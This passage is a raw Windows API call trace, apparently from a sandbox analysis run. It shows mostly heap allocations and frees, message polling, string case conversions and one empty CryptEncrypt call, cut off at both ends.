lpMsg=0x8bf3c0) returned 0 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0264.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0264.782] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.782] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.782] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.782] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.782] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.782] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.783] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0264.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0264.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.788] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.790] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.791] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.791] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.791] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.791] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, 